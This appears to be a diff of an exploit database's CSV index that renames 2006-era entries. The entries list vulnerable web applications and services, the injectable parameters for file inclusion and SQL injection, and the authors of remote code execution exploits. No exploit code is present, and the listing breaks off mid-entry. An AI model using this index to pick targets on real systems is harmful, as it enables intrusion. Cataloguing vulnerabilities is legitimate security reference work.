-1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 -1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution Exploit (1)",2006-05-19,Devil-00,windows,local,0 +1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],php,webapps,0 +1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0 1807,platforms/asp/webapps/1807.txt,"Zix Forum 1.12 - (layid) SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 -1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - (ROOT_PATH) Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps,0 +1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps,0 1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion",2006-05-20,Kacper,php,webapps,0 1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection",2006-05-20,666,php,webapps,0 1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 @@ -1527,7 +1528,7 @@ id,file,description,date,author,platform,type,port 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110 1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x-6.5.2 - (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 1815,platforms/linux/dos/1815.c,"portmap 5 Beta - (Set/Dump) Local Denial of Service",2006-05-22,"Federico L. Bossi Bonin",linux,dos,0 -1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - (DIR_LIBS) Arbitrary Remote File Inclusion Exploit",2006-05-23,rgod,php,webapps,0 +1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - (DIR_LIBS) Arbitrary Remote File Inclusion",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 1819,platforms/multiple/dos/1819.txt,"PunkBuster < 1.229 - (WebTool Service) Remote Buffer Overflow Denial of Service",2006-05-23,"Luigi Auriemma",multiple,dos,0 @@ -1560,38 +1561,38 @@ id,file,description,date,author,platform,type,port 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0 1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0 -1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - (common.php) Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 +1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 1852,platforms/linux/dos/1852.c,"gxine 0.5.6 - (HTTP Plugin) Remote Buffer Overflow (PoC)",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0 1855,platforms/php/webapps/1855.txt,"metajour 2.1 - (system_path) Remote File Inclusion",2006-05-31,Kacper,php,webapps,0 1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer 6 - 'inetconn.dll' Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 -1857,platforms/php/webapps/1857.pl,"TinyPHP Forum 3.6 - 'profile.php' Remote Code Execution Exploit",2006-06-01,Hessam-x,php,webapps,0 -1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - (root_path) Remote File Inclusion",2006-06-01,Kacper,php,webapps,0 +1857,platforms/php/webapps/1857.pl,"TinyPHP Forum 3.6 - 'profile.php' Remote Code Execution",2006-06-01,Hessam-x,php,webapps,0 +1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion",2006-06-01,Kacper,php,webapps,0 1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Inclusion",2006-06-01,beford,php,webapps,0 -1861,platforms/php/webapps/1861.txt,"Redaxo CMS 3.2 - (INCLUDE_PATH) Remote File Inclusion",2006-06-02,beford,php,webapps,0 +1861,platforms/php/webapps/1861.txt,"Redaxo CMS 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,php,webapps,0 1862,platforms/cgi/remote/1862.c,"iShopCart - vGetPost() Remote Buffer Overflow (cgi)",2006-06-02,K-sPecial,cgi,remote,0 1863,platforms/php/webapps/1863.txt,"Igloo 0.1.9 - (Wiki.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 -1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final - (PHPbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 +1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final - 'phpbb_root_path' Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0 -1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Privilege Escalation",2006-06-03,rgod,php,webapps,0 -1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote File Inclusion Exploit",2006-06-03,rgod,php,webapps,0 +1868,platforms/php/webapps/1868.php,"PixelPost 1-5rc1-2 - Privilege Escalation",2006-06-03,rgod,php,webapps,0 +1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote File Inclusion",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - 'catid' SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection",2006-06-03,rgod,php,webapps,0 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - 'profile.php' Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 -1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0 -1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0 +1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution",2006-06-04,K-159,php,webapps,0 +1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution",2006-06-05,rgod,php,webapps,0 1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - Netfilter NAT SNMP Module Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 -1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 +1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - (adminLogin.asp) Login Bypass Exploit",2006-06-06,FarhadKey,asp,webapps,0 1885,platforms/windows/remote/1885.pl,"QBik Wingate 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 @@ -1601,7 +1602,7 @@ id,file,description,date,author,platform,type,port 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0 -1892,platforms/php/webapps/1892.pl,"Guestex GuestBook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 +1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution",2006-06-08,K-sPecial,php,webapps,0 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash (PoC)",2006-06-09,"Federico Fazzi",linux,dos,0 1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 @@ -1617,8 +1618,8 @@ id,file,description,date,author,platform,type,port 1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow",2006-06-12,h07,windows,remote,0 1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - (visview.php) Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 -1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - (phpbb_root_path) File Include",2006-06-13,Kacper,php,webapps,0 -1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0 +1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Include",2006-06-13,Kacper,php,webapps,0 +1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",php,webapps,0 1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Include",2006-06-14,Kacper,php,webapps,0 @@ -1630,20 +1631,20 @@ id,file,description,date,author,platform,type,port 1918,platforms/php/webapps/1918.php,"bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 -1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - (phpbb_root_path) Remote File Inclusion Exploit",2006-06-17,h4ntu,php,webapps,0 +1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0 1922,platforms/php/webapps/1922.php,"Joomla 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - (ipath) Remote File Inclusion",2006-06-17,Basti,php,webapps,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0 1925,platforms/php/webapps/1925.txt,"INDEXU 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 -1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - (abs_path) Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 +1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0 1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0 1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - (microcms_path) Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0 1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps,0 1931,platforms/asp/webapps/1931.txt,"ASP Stats Generator 2.1.1 - SQL Injection",2006-06-19,"Hamid Ebadi",asp,webapps,0 1932,platforms/php/webapps/1932.php,"Ultimate PHP Board 1.96 GOLD - Multiple Vulnerabilities",2006-06-20,"Michael Brooks",php,webapps,0 -1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - (root_path) Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0 -1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 +1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0 +1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow (PoC)",2006-06-20,BassReFLeX,windows,dos,0 1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0 @@ -1653,17 +1654,17 @@ id,file,description,date,author,platform,type,port 1941,platforms/php/webapps/1941.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (2)",2006-06-22,rgod,php,webapps,0 1942,platforms/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0 -1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0 +1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0 1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0 1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection",2006-06-23,rgod,php,webapps,0 1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 -1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0 +1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - 'ROOT_PATH' Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow (PoC)",2006-06-24,"Jerome Athias",windows,dos,0 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 -1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - (phpbb_root_path) Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 +1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 -1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - (auth.api.php) Remote File Inclusion Exploit",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 +1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - (auth.api.php) Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 1956,platforms/php/webapps/1956.txt,"Pearl For Mambo 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection",2006-06-27,simo64,php,webapps,0 @@ -1671,7 +1672,7 @@ id,file,description,date,author,platform,type,port 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 -1962,platforms/osx/local/1962.pl,"Mac OSX 10.4.6 (x86) - (launchd) Local Format String Exploit",2006-06-28,"Kevin Finisterre",osx,local,0 +1962,platforms/osx/local/1962.pl,"Apple Mac OS X 10.4.6 (x86) - 'launchd' Local Format String Exploit",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 @@ -1681,7 +1682,7 @@ id,file,description,date,author,platform,type,port 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - (dbinstall.php) Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - (header.inc.php) Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0 -1973,platforms/osx/local/1973.pl,"Mac OSX 10.4.6 (PPC) - (launchd) Local Format String Exploit",2006-07-01,"Kevin Finisterre",osx,local,0 +1973,platforms/osx/local/1973.pl,"Apple Mac OS X 10.4.6 (PPC) - 'launchd' Local Format String Exploit",2006-07-01,"Kevin Finisterre",osx,local,0 1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0 @@ -1698,7 +1699,7 @@ id,file,description,date,author,platform,type,port 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)",2006-07-06,oveRet,windows,local,0 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 -1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 +1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,php,webapps,0 1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 @@ -1742,20 +1743,20 @@ id,file,description,date,author,platform,type,port 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0 -2035,platforms/php/webapps/2035.php,"toendaCMS 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 +2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0 2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0 2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 -2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - (absolute_path) Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 -2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - (LIST) Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",windows,remote,0 -2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - (JBoss) Remote Code Execution Exploit",2006-07-20,"Jon Hart",hardware,remote,0 +2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 +2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",windows,remote,0 +2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - (JBoss) Remote Code Execution",2006-07-20,"Jon Hart",hardware,remote,0 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 2051,platforms/linux/dos/2051.py,"Sendmail 8.13.5 - Remote Signal Handling (PoC)",2006-07-21,redsand,linux,dos,0 -2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0 +2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution (MS06-014)",2006-07-21,redsand,windows,remote,0 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (2)",2006-07-21,bannedit,multiple,remote,110 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 -2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0 +2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 @@ -1770,7 +1771,7 @@ id,file,description,date,author,platform,type,port 2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Blind SQL Injection",2006-07-24,rgod,php,webapps,0 2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow Exploit",2006-07-24,"Jacopo Cervini",windows,remote,5060 -2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - (username) SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0 +2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'username' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0 2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - (rfiles.php) Remote Command Execution Exploit",2006-07-25,rgod,php,webapps,0 2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit)",2006-07-26,ri0t,windows,remote,10616 @@ -1781,16 +1782,16 @@ id,file,description,date,author,platform,type,port 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - (chemin) Remote File Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0 -2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - Javascript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0 +2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0 2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component 3.0.5 - Inclusion",2006-07-28,Drago84,php,webapps,0 2084,platforms/php/webapps/2084.txt,"Mambo MGM Component 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 -2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 